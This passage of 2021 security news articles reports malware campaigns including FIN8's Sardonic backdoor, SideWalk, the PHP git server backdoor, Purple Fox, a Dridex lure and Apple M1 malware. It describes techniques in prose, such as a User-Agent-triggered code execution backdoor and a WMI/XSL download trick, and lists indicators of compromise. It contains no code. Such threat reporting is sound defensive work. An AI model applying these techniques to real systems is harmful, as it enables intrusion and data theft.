that allow users to carve out a percentage of their internet bandwidth for other
devices, often for a fee, through a client application offered by the provider,
enabling other customers to access the internet using the internet connections
offered by nodes on the network. For consumers, such services are "advertised as
a means to circumvent geolocation checks on streaming or gaming platforms while
generating some income for the user offering up their bandwidth," the
researchers explained.
But the illicit use of proxyware also introduces a multitude of risks in that they could permit threat actors to obfuscate the source of their attacks, thereby not only giving them the ability to perform malicious actions by making it appear as if they are originating from legitimate residential or corporate networks, but also render ineffective conventional network defenses that rely on IP-based blocklists.
"The same mechanisms currently used to monitor and track Tor exit nodes,
'anonymous' proxies, and other common traffic obfuscation techniques do not
currently exist for tracking nodes within these proxyware networks," the
researchers noted.
That's not all. Researchers identified several techniques adopted by bad actors, including trojanized proxyware installers that allow for stealthy distribution of information stealers and remote access trojans (RATs) without the victims' knowledge. In one instance observed by Cisco Talos, attackers were found using the proxyware applications to monetize victims' network bandwidth to generate revenue as well as exploit the compromised machine's CPU resources for mining cryptocurrency.
Another case involved a multi-stage malware campaign that culminated in the
deployment of an info-stealer, a cryptocurrency mining payload, as well as
proxyware software, underscoring the "varied approaches available to
adversaries," who can now go beyond cryptojacking to also plunder valuable data
and monetize successful infections in other ways.
Even more concerningly, researchers detected malware that was used to silently install Honeygain on infected systems, and register the client with the adversary's Honeygain account to profit off the victim's internet bandwidth. This also means that an attacker can sign up for multiple Honeygain accounts to scale their operation based on the number of infected systems under their control.
"For organizations, these platforms pose two essential problems: The abuse of their resources, eventually being blocklisted due to activities they don't even control and it increases organizations' attack surface, potentially creating an initial attack vector directly on the endpoint,'' the researchers concluded. "Due to the various risks associated with these platforms, it is recommended that organizations consider prohibiting the use of these applications on corporate assets."
Researchers Uncover FIN8's New Backdoor Targeting Financial Institutions
25.8.21
Virus
Thehackernews
A financially motivated threat actor notorious for setting its sights on retail,
hospitality, and entertainment industries has been observed deploying a
completely new backdoor on infected systems, indicating the operators are
continuously retooling their malware arsenal to avoid detection and stay under
the radar.
The previously undocumented malware has been dubbed "Sardonic" by Romanian cybersecurity technology company Bitdefender, which it encountered during a forensic investigation in the wake of an unsuccessful attack carried out by FIN8 aimed at an unnamed financial institution located in the U.S.
Said to be under active development, "Sardonic backdoor is extremely potent and has a wide range of capabilities that help the threat actor leverage new malware on the fly without updating components," Bitdefender researchers Eduard Budaca and Victor Vrabie said in a report shared with The Hacker News.
Since emerging on the scene in January 2016, FIN8 has leveraged a multitude of
techniques such as spear-phishing and malicious software such as PUNCHTRACK and
BADHATCH to steal payment card data from point-of-sale (POS) systems.
The threat group, which is known for taking extended breaks in between campaigns to fine-tune its tactics and increase the success rate of its operations, conducts cyber incursions primarily through "living off the land" attacks, using built-in tools and interfaces like PowerShell as well as taking advantage of legitimate services like sslip.io to disguise their activity.
Earlier this March, Bitdefender revealed FIN8's return after a year-and-a-half hiatus to target insurance, retail, technology, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, Panama, and Italy with a revamped version of the BADHATCH implant featuring upgraded capabilities, including screen capturing, proxy tunneling, credential theft, and fileless execution.
In the latest incident analyzed by the firm, the attackers are said to have infiltrated the target network to conduct detailed reconnaissance, before carrying out lateral movement and privilege escalation activities to deploy the malware payload. "There were multiple attempts to deploy the Sardonic backdoor on domain controllers in order to continue with privilege escalation and lateral movement, but the malicious command lines were blocked," the researchers said.
Written in C++, Sardonic not only takes steps to establish persistence on the
compromised machine, but also comes equipped with capabilities that allow it to
obtain system information, execute arbitrary commands, and load and execute
additional plugins, the results of which are transmitted to a remote
attacker-controlled server.
If anything, the latest development is yet another sign of FIN8's shift in tactics by strengthening its capabilities and malware delivery infrastructure. To mitigate the risk associated with financial malware, companies are recommended to separate their POS networks from those used by employees or guests, train employees to better spot phishing emails, and improve email security solutions to filter potentially suspicious attachments.
New SideWalk Backdoor Targets U.S.-based Computer Retail Business
25.8.21
Virus
Thehackernews
A computer retail
company based in the U.S. was the target of a previously undiscovered implant
called SideWalk as part of a recent campaign undertaken by a Chinese advanced
persistent threat group primarily known for singling out entities in East and
Southeast Asia.
Slovak cybersecurity firm ESET attributed the malware to an advanced persistent threat it tracks under the moniker SparklingGoblin, an adversary believed to be connected to the Winnti umbrella group, noting its similarities to another backdoor dubbed Crosswalk that was put to use by the same threat actor in 2019.
"SideWalk is a modular backdoor that can dynamically load additional modules sent from its C&C [command-and-control] server, makes use of Google Docs as a dead drop resolver, and Cloudflare workers as a C&C server," ESET researchers Thibaut Passilly and Mathieu Tartare said in a report published Tuesday. "It can also properly handle communication behind a proxy."
Since first emerging on the threat landscape in 2019, SparklingGoblin has been
linked to several attacks aimed at Hong Kong universities using backdoors such
as Spyder and ShadowPad, the latter of which has become a preferred malware of
choice among multiple Chinese threat clusters in recent years.
Over the past year, the collective has hit a broad range of organizations and verticals around the world, with a particular focus on the academic institutions located in Bahrain, Canada, Georgia, India, Macao, Singapore, South Korea, Taiwan, and the U.S. Other targeted entities include media companies, religious organizations, e-commerce platforms, computer and electronics manufacturers, and local governments.
SideWalk is characterized as an encrypted shellcode, which is deployed via a .NET loader that takes care of "reading the encrypted shellcode from disk, decrypting it and injecting it into a legitimate process using the process hollowing technique." The next phase of the infection commences with SideWalk establishing communications with the C&C server, with the malware retrieving the encrypted IP address from a Google Docs document.
"The decrypted IP address is 80.85.155[.]80. That C&C server uses a self-signed certificate for the facebookint[.]com domain. This domain has been attributed to BARIUM by Microsoft, which partially overlaps with what we define as Winnti Group. As this IP address is not the first one to be used by the malware, it is considered to be the fallback one," the researchers said.
Besides using HTTPS protocol for C&C communications, SideWalk is designed to load arbitrary plugins sent from the server, amass information about running processes, and exfiltrate the results back to the remote server.
"SideWalk is a previously undocumented backdoor used by the SparklingGoblin APT group. It was most likely produced by the same developers as those behind CROSSWALK, with which it shares many design structures and implementation details," the researchers concluded.
PHP Infiltrated with Backdoor Malware
30.3.2021
Virus
Securityaffairs
The server for the web-application scripting language was compromised on Sunday.
The PHP project on Sunday announced that attackers were able to gain access to its main Git server, uploading two malicious commits, including a backdoor. They were discovered before they went into production.
PHP is a widely used open-source scripting language often used for web development. It can be embedded into HTML. The commits were pushed to the php-src repository, thus offering attackers a supply-chain opportunity to infect websites that pick up the malicious code believing it to be legit.
Both commits claimed to “fix a typo” in the source code. They were uploaded using the names of PHP’s maintainers, Rasmus Lerdorf and Nikita Popov, according to a message sent by Popov to the project’s mailing list on Sunday. He added that he didn’t think it was simple case of credential theft.
“We don’t yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account),” he explained.
In response to the hack, PHP is moving its servers to GitHub, making them canonical.
“While investigation is still underway, we have decided that maintaining our own git infrastructure is an unnecessary security risk, and that we will discontinue the git.php.net server,” Popov explained. “Instead, the repositories on GitHub, which were previously only mirrors, will become canonical. This means that changes should be pushed directly to GitHub rather than to git.php.net…This change also means that it is now possible to merge pull requests directly from the GitHub web interface.”
He also noted that PHP is reviewing all of its repositories for any corruption beyond the two commits that were found.
“We are lucky that the malicious commits were detected before reaching production systems,” said Craig Young, principal security researcher at Tripwire, via email. “Had it not been detected, the code could have ultimately poisoned the binary package repositories which countless organizations rely upon and trust. Open-source projects which are self-hosting their code repositories may be at increased risk of this type of supply-chain attack and must have robust processes in place to detect and reject suspicious commits.”
Weaponizing the Software Supply Chain
Making use of open-source repositories
as a vehicle to compromise websites and applications is not uncommon.
In March, for instance, researchers spotted malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository — all of which exfiltrated sensitive information. The packages weaponized a proof-of-concept (PoC) code dependency-confusion exploit that was recently devised by security researcher Alex Birsan to inject rogue code into developer projects.
In January meanwhile, three malicious software packages were published to npm, masquerading as legitimate by using brandjacking. Any applications corrupted by the code could steal tokens and other information from Discord users, researchers said.
And in December, RubyGems, an open-source package repository and manager for the Ruby web programming language, took two of its software packages offline after they were found to be laced with malware.
Hackers breached the PHP ‘s Git Server and inserted a backdoor in the source
code
30.3.2021
Virus
Securityaffairs
Threat actors hacked the official Git server of the PHP programming language and
pushed unauthorized updates to insert a backdoor into the source code.
Unknown attackers hacked the official Git server of the PHP programming language
and pushed unauthorized updates to insert a backdoor into the source code.
On March 28, the attackers pushed two commits to the “php-src” repository hosted on the git.php.net server, they used the accounts of Rasmus Lerdorf, the PHP’s author, and Jetbrains developer Nikita Popov.
Maintainers of the project are investigating the supply chain attacks, experts believe attackers have compromised the git.php.net server.
“We don’t yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account).” wrote Popov. “While investigation is still underway, we have decided that maintaining our own git infrastructure is an unnecessary security risk, and that we will discontinue the git.php.net server. Instead, the repositories on GitHub, which were previously only mirrors, will become canonical. This means that changes should be pushed directly to GitHub rather than to git.php.net.”
The maintainers of the PHP reverted the changes and are reviewing the repositories to detect any other evidence of compromise beyond the two referenced commits.
In the future, in order to access the repositories, users will now need to be part of the php organization on GitHub and their account will have 2FA enabled. Adopting this new configuration it is possible to merge pull requests directly from the GitHub web interface.
At this time, it is not immediately clear if the backdoor was downloaded and distributed by other parties before the malicious commits were detected.
The analysis of malicious code revealed the presence of a string “Zerodium,” which is the name of one of the most popular zero-day brokers.
Despite the references to Zerodium in the code of the backdoor, there is no
evidence to suggest that the malware was designed to be sold as a
proof-of-concept (PoC) to the 0day broker.
Backdoor Disguised as Typo Fix Added to PHP Source Code
30.3.2021
Virus
Securityweek
The developers of the PHP scripting language revealed on Sunday that they had identified what appeared to be malicious code in the php-src repository hosted on the git.php.net server.
The unauthorized code was disguised as two typo fix-related commits apparently pushed by Rasmus Lerdorf, author of the PHP language, and Nikita Popov, an important PHP contributor. The code seems to allow an attacker to remotely execute arbitrary PHP code.
The investigation into this incident is ongoing, but the backdoor was discovered quickly and it apparently did not make it into a PHP update made available to users.
“We don't yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov explained after the incident was discovered.
“While investigation is still underway, we have decided that maintaining our own git infrastructure is an unnecessary security risk, and that we will discontinue the git.php.net server. Instead, the repositories on GitHub, which were previously only mirrors, will become canonical. This means that changes should be pushed directly to GitHub rather than to git.php.net,” he added.
Interestingly, the malicious code is triggered by the string “zerodium.” Zerodium is the name of a well-known and controversial exploit acquisition company that claims to provide exploits to “government organizations (mainly from Europe and North America) in need of advanced zero-day exploits and cybersecurity capabilities.”
The commit added to the PHP code also contains the text “REMOVETHIS: sold to zerodium, mid 2017.”
It’s unclear if and how Zerodium is linked to this incident, but SecurityWeek has reached out to the company for comment and will update this article if it responds.
PHP's Git Server Hacked to Insert Secret Backdoor to Its Source code
30.3.2021
Virus
Thehackernews
In yet another instance of a software supply chain attack, unidentified actors hacked the official Git server of the PHP programming language and pushed unauthorized updates to insert a secret backdoor into its source code.
The two malicious commits were pushed to the self-hosted "php-src" repository hosted on the git.php.net server, illicitly using the names of Rasmus Lerdorf, the author of the programming language, and Nikita Popov, a software developer at Jetbrains.
The changes are said to have been made yesterday on March 28.
"We don't yet know how exactly this happened, but everything points towards a
compromise of the git.php.net server (rather than a compromise of an individual
git account)," Popov said in an announcement.
The changes, which were committed as "Fix Typo" in an attempt to slip through undetected as a typographical correction, involved provisions for execution of arbitrary PHP code. "This line executes PHP code from within the useragent HTTP header ("HTTP_USER_AGENTT"), if the string starts with 'zerodium'," PHP developer Jake Birchall said.
Besides reverting the changes, the maintainers of PHP are said to be reviewing the repositories for any corruption beyond the aforementioned two commits. It's not immediately clear if the tampered codebase was downloaded and distributed by other parties before the changes were spotted and reversed.
Zerodium is a zero-day exploit broker known for acquiring high-impact and high-risk vulnerabilities found in some of the most used software products on the market today. Despite references in the backdoor code, there is no evidence to suggest if this was an attempt on the part of the hackers to sell a proof-of-concept (PoC) to the company.
In the wake of the breach, the team behind PHP is making a number of changes, including migrating the source code repository to GitHub, with changes to be pushed directly to GitHub rather than to git.php.net going forward. Additionally, contributing to the PHP project will now require developers to be added as a part of the organization on GitHub.
The development comes almost two months after researchers demonstrated a novel supply chain attack called "dependency confusion" that's designed to execute unauthorized code inside a target's internal software build system.
We have reached out to the maintainers of PHP regarding the incident and we will update the story if we hear back.
New Purple Fox version includes Rootkit and implements wormable propagation
29.3.2021
Virus
Securityaffairs
Researchers from Guardicore have spotted a new variant of the Purple Fox Windows
malware that implements worm-like propagation capabilities.
Researchers from
Guardicore have discovered a new version of the Purple Fox Windows malware that
implements worm-like propagation capabilities.Up until recently, Purple Fox’s
operators infected machines by using exploit kits and phishing emails.
Previous versions of the malware were infecting machines by using exploit kits
and phishing emails, while the new samples were targeting Windows machines
exposed online through SMB password brute force.
“Purple Fox was discovered
in March of 2018 and was covered as an exploit kit targeting Internet Explorer
and Windows machines with various privilege escalation exploits.” reads the
report published by Guardicore- “However, throughout the end of 2020 and the
beginning of 2021, Guardicore Global Sensors Network (GGSN) detected Purple
Fox’s novel spreading technique via indiscriminate port scanning and
exploitation of exposed SMB services with weak passwords and hashes.”
Since May 2020, experts have observed a rise by roughly 600% and amounted to a total of 90,000 attacks between the rest of 2020 and the beginning of 2021.
The Purple Fox malware was first discovered in March 2018, it is distributed in
the form of malicious “.msi” packages that were found by the experts on nearly
2,000 compromised Windows servers. The installer will extract the payloads and
decrypt them from within the MSI package.
According to Guardicore, the post
exploitation functionality of Purple Fox hasn’t changed much.
Once a malware infected a system, the malware blocks multiple ports (445, 139, and 135) to prevent the infected machine from being reinfected or targeted by other attackers.
The malware attempt to spread by generating IP ranges and scanning them on port
445, then it will try to authenticate to SMB by performing brute attacks or by
trying to establish a null session.
Once authenticated, the malicious code
will create a service whose name matches the regex AC0[0-9]{1} (e.g. AC01, AC02,
AC05) that will download the MSI installation package from one of the many HTTP
servers.
Experts reported that the MSI package contains three files, a 64bit DLL payload
(winupdate64), a 32bit DLL payload (winupdate32), and an encrypted file
containing a rootkit.
Researchers from security firm 360 Security published a
detailed analysis of the relationship between Purple Fox and the rootkit.
“Once the rootkit is loaded, the installer will reboot the machine in order to rename the malware DLL into a system DLL file that will be executed on boot.” concludes the analysis. “Once the machine is restarted, the malware will be executed as well. After it’s execution, the malware will start its propagation process”
Experts from Guardicore published the indicators of compromise (IoCs) associated with the latest malware campaign.
Purple Fox Malware Targets Windows Machines With New Worm Capabilities
25.3.2021
Virus
Threatpost
A new infection vector from the established malware puts internet-facing Windows systems at risk from SMB password brute-forcing.
A malware that has historically targeted exposed Windows machines through phishing and exploit kits has been retooled to add new “worm” capabilities.
Purple Fox, which first appeared in 2018, is an active malware campaign that until recently required user interaction or some kind of third-party tool to infect Windows machines. However, the attackers behind the campaign have now upped their game and added new functionality that can brute force its way into victims’ systems on its own, according to new Tuesday research from Guardicore Labs.
“Guardicore Labs have identified a new infection vector of this malware where internet-facing Windows machines are being breached through SMB password brute force,” Guardicore Labs’ Amit Serper said.
In addition to these new worm capabilities, Purple Fox malware now also includes a rootkit that allows the threat actors to hide the malware on the machine and make it difficult to detect and remove, he said.
Latest Attack Vector
Researchers analyzed Purple Fox’s latest activity and
found two significant changes to how attackers are propagating malware on
Windows machines. The first is that the new worm payload executes after a victim
machine is compromised through a vulnerable exposed service (such as SMB).
Purple Fox also is using a previous tactic to infect machines with malware through a phishing campaign, sending the payload via email to exploit a browser vulnerability, researchers observed.
Once the worm infects a victim’s machine, it creates a new service to establish persistence and execute a simple command that can iterate through a number of URLs that include the MSI for installing Purple Fox on a compromised machine, said Serper.
“msiexec will be executed with the /i flag, in order to download and install the malicious MSI package from one of the hosts in the statement,” he explained. “It will also be executed with the /Q flag for ‘quiet’ execution, meaning, no user interaction will be required.”
Once the package is executed, the MSI installer will launch by impersonating a Windows Update package along with Chinese text, which roughly translates to “Windows Update” and random letters, he said. These letters are randomly generated between each different MSI installer to create a different hash and make it difficult to create links between different versions of the same MSI.
“This is a ‘cheap’ and simple way of evading various detection methods, such as static signatures,” Serper wrote.
As the installation progresses, the installer will extract the payloads and decrypt them from within the MSI package, activity that includes modifying the Windows firewall in such a way as to prevent the infected machine from being reinfected, and/or to be exploited by a different threat actor, researchers observed.
The extracted files are then executed and a rootkit—which “ironically” was developed by a security researcher to keep malware research tasks hidden from the malware itself — is installed that hides various registry keys and values, files, etc., according to Serper.
The installer then reboots the machine to both rename the malware dynamic link library (DLL) into a system DLL file that will be executed on boot as well as to execute the malware, which immediately begins its propagation process. This entails generating IP ranges and beginning to scan them on port 445 to start the brute-forcing process, researchers said.
If the authentication is successful, the malware will create a service that will download the MSI installation package from one of the many HTTP servers in use, completing the infection loop, according to researchers.
Previous Purple Fox Activity
Researchers identified nearly 3,000 servers
previously compromised by the actors behind Purple Fox, which they have
repurposed to host their droppers and malicious payloads, said Serper.
Purple Fox malware incidents. Credit: Guardicore Labs
“We have established that the vast majority of the servers, which are serving the initial payload, are running on relatively old versions of Windows Server running IIS version 7.5 and Microsoft FTP, which are known to have multiple vulnerabilities with varying severity levels,” he wrote.
Purple Fox was last seen engaging in significant malicious activity last spring and summer, with activity falling slightly off toward the end of the year and then ramping up again in early 2021, researchers said. Since May 2020, infections rose by about 600 percent for a total of 90,000 attacks at the time of the post, according to researchers.
Last July, for instance, the Purple Fox exploit kit (EK) added two new exploits targeting critical- and high-severity Microsoft vulnerabilities to its bag of tricks. At the time researchers said they were expecting attackers to add new functionality in the future as well.
Purple Fox is only the latest malware to be retooled with “worm” capabilities – other malware families like the Rocke Group and the Ryuk ransomware have also added self-propagation functionalities.
Honeywell Says Malware Disrupted IT Systems
25.3.2021
Virus
Securityweek
Industrial giant Honeywell on Tuesday revealed that some of its IT systems were disrupted as a result of a malware attack.
The company said the intrusion was detected “recently” and only a “limited number” of IT systems were disrupted. No other information has been provided regarding impact.
An investigation into the incident is ongoing, but Honeywell says it has found no evidence to date that the attacker managed to exfiltrate data from systems that store customer information. However, based on its statement, it cannot completely rule out that some customer data may have been compromised.
“At this time, we do not expect this incident will have a material impact on Honeywell,” the company stated. “We promptly took steps to address the incident, including partnering with Microsoft to assess and remediate the situation. Our systems have since been secured, we identified the point of entry, and all unauthorized access has been revoked.”
Law enforcement has been notified and impacted services should be working properly by now.
SecurityWeek has reached out to Honeywell to find out if the incident involved a piece of ransomware.
The news from Honeywell comes shortly after Canada-based IoT company Sierra Wireless revealed that some of its internal IT systems were recently hit by ransomware. Sierra, which also provides solutions for — among others — industrial organizations, said the incident disrupted production at manufacturing facilities.
Other major companies that recently reported disruption to production operations due to a cyberattack include beverage conglomerate Molson Coors and packaging giant WestRock.
Purple Fox Malware Squirms Like a Worm on Windows
24.3.2021
Virus
Securityweek
Malware hunters at Guardicore are warning that an aggressive botnet operator has turned to SMB password brute-forcing to infect and spread like a worm across the Microsoft Windows ecosystem.
The malware campaign, dubbed Purple Fox, has been active since at least 2018 and the discovery of the new worm-like infection vector is yet another sign that consumer-grade malware continues to reap profits for cybercriminals.
According to Guardicore researcher Amit Serper, the Purple Fox operators primarily used exploit kits and phishing emails to build botnets for crypto-mining and other nefarious uses.
Now, the new SMB brute-force method is being combined with rootkit capabilities to hide and spread widely across internet-facing Windows computers with weak passwords.
“Throughout the end of 2020 and the beginning of 2021, Guardicore Global Sensors Network (GGSN) detected Purple Fox’s novel spreading technique via indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes,” Serper explained.
Serper said May 2020 saw a “significant amount of malicious activity” where the number of infections climbed by roughly 600% and amounted to a total of 90,000 attacks.
Serper’s blog, which contains IOCs to help defenders hunt for signs of infection, explains the aggressiveness of the malware operator:
“While it appears that the functionality of Purple Fox hasn’t changed much post exploitation, its spreading and distribution methods – and its worm-like behavior – are much different than described in previously published articles. Throughout our research, we have observed an infrastructure that appears to be made out of a hodge-podge of vulnerable and exploited servers hosting the initial payload of the malware, infected machines which are serving as nodes of those constantly worming campaigns, and server infrastructure that appears to be related to other malware campaigns.
Serper’s team at Guardicore warned that the attackers are hosting various MSI packages on nearly 2,000 servers, most of which are compromised machines which were repurposed to host malicious payloads.
“We have established that the vast majority of the servers, which are serving the initial payload, are running on relatively old versions of Windows Server running IIS version 7.5 and Microsoft FTP, which are known to have multiple vulnerabilities with varying severity levels,” Guardicore said in a technical blog post.
The company found the campaign spreading via two distinct mechanisms -- a worm payload after a victim machine is compromised through a vulnerable exposed service (such as SMB); or the worm payload is being sent via email through a phishing campaign.
The company is encouraging malware hunters to use public indicators of compromise to find signs of malicious activity related to this threat.
Purple Fox Rootkit Can Now Spread Itself to Other Windows Computers
24.3.2021
Virus
Thehackernews
Purple Fox, a Windows malware previously known for infecting machines by using exploit kits and phishing emails, has now added a new technique to its arsenal that gives it worm-like propagation capabilities.
The ongoing campaign makes use of a "novel spreading technique via indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes," according to Guardicore researchers, who say the attacks have spiked by about 600% since May 2020.
A total of 90,000 incidents have been spotted through the rest of 2020 and the beginning of 2021.
First discovered in March 2018, Purple Fox is distributed in the form of malicious ".msi" payloads hosted on nearly 2,000 compromised Windows servers that, in turn, download and execute a component with rootkit capabilities, which enables the threat actors to hide the malware on the machine and make it easy to evade detection.
Guardicore says Purple Fox hasn't changed much post-exploitation, but where it
has is in its worm-like behavior, allowing the malware to spread more rapidly.
It achieves this by breaking into a victim machine through a vulnerable, exposed service such as server message block (SMB), leveraging the initial foothold to establish persistence, pull the payload from a network of Windows servers, and stealthily install the rootkit on the host.
Once infected, the malware blocks multiple ports (445, 139, and 135), likely in an attempt to "prevent the infected machine from being reinfected, and/or to be exploited by a different threat actor," notes Amit Serper, Guardicore's new vice president of security research for North America.
In the next phase, Purple Fox commences its propagation process by generating IP ranges and scanning them on port 445, using the probes to single out vulnerable devices on the Internet with weak passwords and brute-forcing them to ensnare the machines into a botnet.
While botnets are often deployed by threat actors to launch denial-of-network attacks against websites with the goal of taking them offline, they can also be used to spread all kinds of malware, including file-encrypting ransomware, on the infected computers, although in this case, it's not immediately clear what the attackers are looking to achieve.
If anything, the new infection vector is another sign of criminal operators constantly retooling their malware distribution mechanism to cast a wide net and compromise as many machines as possible. Details about the indicators of compromise (IoCs) associated with the campaign can be accessed here.
$4,000 COVID-19 ‘Relief Checks’ Cloak Dridex Malware
18.3.2021
Virus
Threatpost
The American Rescue Act
is the latest zeitgeisty lure being circulated in an email campaign.
Cybercriminals have wasted no time in hopping on the American Rescue Plan – the COVID-19 relief legislation just signed into law – as a lure for email-based scams.
According to researchers at Cofense, a campaign began circulating in March that capitalized on Americans’ interest in the forthcoming $1,400 relief payments and other aid. The emails impersonate the IRS, using the agency’s official logo and a spoofed sender domain of IRS[.]gov – and claim to offer an application for financial assistance. In reality, the emails offer the Dridex banking trojan.
The email says, “It is possible to get aid from the federal government of your choice” and then offers “quotes” for a pie-in-the-sky litany of great (and nonexistent) things – such as a $4,000 check, the ability to “skip the queue for vaccination” and free food.
There’s a button that says, “Get apply form” – if clicked, users are taken to a
Dropbox account where they see an Excel document that says, “Fill this form
below to accept Federal State Aid.” However, to see this supposed IRS form in
its entirety, victims are prompted to enable content. If they do, they trigger
macros that set off the infection chain indirectly, according to Cofense.
The email lure. Source: Cofense.
“While static analysis easily identifies the URLs used to download malware in this case, automated behavioral analysis may have trouble recognizing the activity as malicious because it does not use macros to directly download malware or run a PowerShell script,” Cofense researchers explained, in a posting on Tuesday. “The macros used by the .XLSM files drop an .XSL file to disk, and then use a Windows Management Instrumentation (WMI) query to gather system information.”
WMI is a subsystem of PowerShell that gives admins access to system monitoring tools, including the ability to ask for information about anything that exists on a given computer – such as which files and applications are present. It can also request responses to these queries to be given in a certain format.
“The WMI query employed in this case…demands that the dropped .XSL file be used to format the response to the query,” researchers wrote. “This formatting directive allows JavaScript contained in the .XSL file to be executed via WMI and download malware, avoiding the more commonly seen methods via PowerShell.”
What is the Dridex Banking Trojan?
Since its first appearance in 2011, the
Dridex malware (a.k.a. Bugat and Cridex) has been deployed via phishing emails
and generally targets banking information. After capturing banking credentials,
it endeavors to make unauthorized electronic funds transfers from unknowing
victims’ bank accounts.
By 2015, the malware was one of the most prevalent financial trojans in the wild, particularly when it came to targeting corporate employees; while later versions of the malware were designed with the added function of assisting in the installation of ransomware. It has also enhanced its obfuscation capabilities over time.
In December 2019, authorities cracked down on Russian-speaking cybercrime group Evil Corp. with sanctions and charges against its leader, Maksim Yakubets, known for his lavish lifestyle. U.S. authorities are still offering up to $5 million for information leading to his arrest; they allege that Yakubets and Evil Corp. have stolen millions of dollars from victims using the Dridex banking trojan and Zeus malware.
How to Prevent the Phish
This latest campaign is convincing, researchers said
– to a certain extent. One sneaky trick the attackers use is that the email
domain is lRS[.]gov – but with a lower-case ‘L’ rather than an upper-case ‘I.’
However, phrasing like “Federal State Aid” (federal and state aid are two different things) and off grammar such as “the federal government of your choice” should set off warning bells.
“A close examination of the email shows a few suspicious characteristics,” according to Cofense. “The phrasing within the document, while not clearly as bad as something auto-translated from another language, still has some mistakes that are unexpected from what purports to be a government communication.”
They added, “Despite those issues, this campaign is likely to entice the average user who’s in a hurry to learn more about the rescue plan.”
To avoid becoming a victim, users should hone their phishing-recognition skills, such as scanning for slight differences between legitimate and spoofed domains. And for businesses, “as a general rule, WMI and PowerShell should be carefully monitored on most workstations,” Cofense recommended.
Good old malware for the new Apple Silicon platform
13.3.2021
Virus
Securelist
A short while ago, Apple released
Mac computers with the new chip called Apple M1. The unexpected release was a
milestone in the Apple hardware industry. However, as technology evolves, we
also observe a growing interest in the newly released platform from malware
adversaries. This inevitably leads us to new malware samples compiled for the
Apple Silicon platform. In this article, we are going to take a look at threats
for Macs with the Apple M1 chip on board. Also, we prepared a short F.A.Q.
section at the end of the article for those who want to understand better the
security risks of M1 malware. Let’s dive in.
XCSSET malware
Last year, a threat called XCSSET was discovered for the first
time. It targets mainly Mac developers using a unique way of distribution:
injecting a malicious payload into Xcode IDE projects on the victim’s Mac. This
payload will be executed at the time of building project files in Xcode. XCSSET
modules have numerous capabilities, such as:
Reading and dumping Safari cookies,
Injecting malicious JavaScript code into
various websites,
Stealing user files and information from applications, such
as Notes, WeChat, Skype, Telegram, etc.,
Encrypting user files.
All these
various features, in combination with high stealth and an unusual way of
distribution, make XCSSET a dangerous threat for Mac computers.
While exploring the various executable modules of XCSSET, we found out that some
of them also contained samples compiled specially for new Apple Silicon chips.
For example, a sample with the MD5 hash sum 914e49921c19fffd7443deee6ee161a4
contains two architectures: x86_64 and ARM64.
The first one corresponds to previous-generation, Intel-based Mac computers, but the second one is compiled for ARM64 architecture, which means that it can run on computers with the new Apple M1 chip. According to VirusTotal, this sample was first uploaded on 2021-02-24 21:06:05 and the original research report did not contain this hash or a module named “metald”, the name of the executable file. With this information on hand, we can assume that the XCSSET campaign is probably still ongoing. This leads us to the thought that more and more malware writers are actively recompiling their samples to have an opportunity to run on new Apple Silicon Macs natively.
Silver Sparrow threat
XCSSET is not the only family which has adapted to run
natively on Apple Silicon. According to a RedCanary report, a new threat called
Silver Sparrow has been identified. This threat introduces a new way for malware
writers to abuse the default packaging functionality: instead of placing a
malicious payload in preinstall or postinstall scripts, malware writers hid one
in the Distribution XML file.
This payload uses JavaScript API to run bash commands in order to download a
JSON configuration file.
Downloading of JSON config
And after successfully downloading that configuration file, the sample extracts
a URL from the downloadURL field for the next download.
Downloading and executing a payload
Also, an appropriate Launch Agent is created for persistent execution of the
malicious sample.
Malware persistence
This JavaScript payload can be executed regardless of chip architecture, but in the package file with the MD5 hash sum fdd6fb2b1dfe07b0e57d4cbfef9c8149, there is a “fat” Mach-O containing two supported architectures (ARM64 and x86_64), as compared to the old package with the MD5 hash sum 30c9bc7d40454e501c358f77449071aa. This means that the malware actors are trying to expand their attack coverage by supporting a wider range of platforms.
Adware threats for the new platform
However, there are not just malware
samples that can be launched on Apple Silicon. A known Mac malware researcher
Patrick Wardle recently published a post covering Pirrit adware. Though it is an
old and well-known adware family, it is still actively updated by their authors
and new samples are encountered in the wild quite often.
These updates include:
Anti-debug techniques such as using ptrace syscall with a PT_DENY_ATTACH flag,
Control flow obfuscation techniques,
Dynamic imports with dlsym calls to
avoid static analysis,
Virtual machine detection anti-analysis.
Control flow obfuscation; dynamic symbols resolving with dlsym
Besides these improvements in regular Intel x86_64 samples, new ARM64 samples were introduced. These are crafted specifically for the Apple Silicon M1 chip, but the consequences of running these are roughly the same: launching Pirrit adware results in pop-ups, banners and various annoying advertisements displayed on the victim’s Mac.
Pirrit is not the only adware family to have begun supporting the Apple Silicon
platform recently. For example, we also observed an ARM64 Bnodlero adware sample
(MD5 82e02c1ca8dfb4c60ee98dc877ce77c5), which runs a bash downloader script
using the system() function.
Bash downloader executed by Bnodlero sample
Frequently Asked Questions
What is so special about M1 threats?
Well, there is not much special about them, frankly speaking. The only thing that distinguishes the new Apple M1 threats from previous ones targeting Intel-based Mac computers is the architecture of the Mac processor for which the executable is compiled. In order to get their applications to run on Apple Silicon, software developers should recompile their code into executables which can run on the M1 chip. The same is true for malware adversaries.
Is Apple M1 chip less secure than Intel ones?
No, it is just a matter of platform support in malware executables.
Are Intel-based Macs affected by M1 threats?
Yes and no. On the one hand, code that is compiled exclusively for the Apple Silicon platform cannot be natively executed on the Intel x86_64 architecture. On the other hand, malicious samples are often delivered in so-called “fat” Mach-O, which usually contains the same code but is compiled for several architectures. This means that running this “fat” executable will result in launching the right malicious code depending on your platform architecture. Pirrit and Bnodlero samples are great examples of this approach.
Can threats for Intel-based Macs run on Apple M1?
Yes, they can. Due to the Rosetta 2 feature, newly released Mac computers with Apple M1 can also run malicious code written exclusively for Intel x86_64 architecture. This backward compatibility will certainly be abused by malware operators until Apple completes the transition to their proprietary chips.
Is there an upward trend in M1 malware?
Yes, there certainly is, and it is absolutely to be expected. As soon as a platform becomes more popular or highly anticipated, developers try to ensure that their software is available for it. Malware developers are no exception.
Conclusion
With the new M1 chip, Apple has certainly pushed its performance
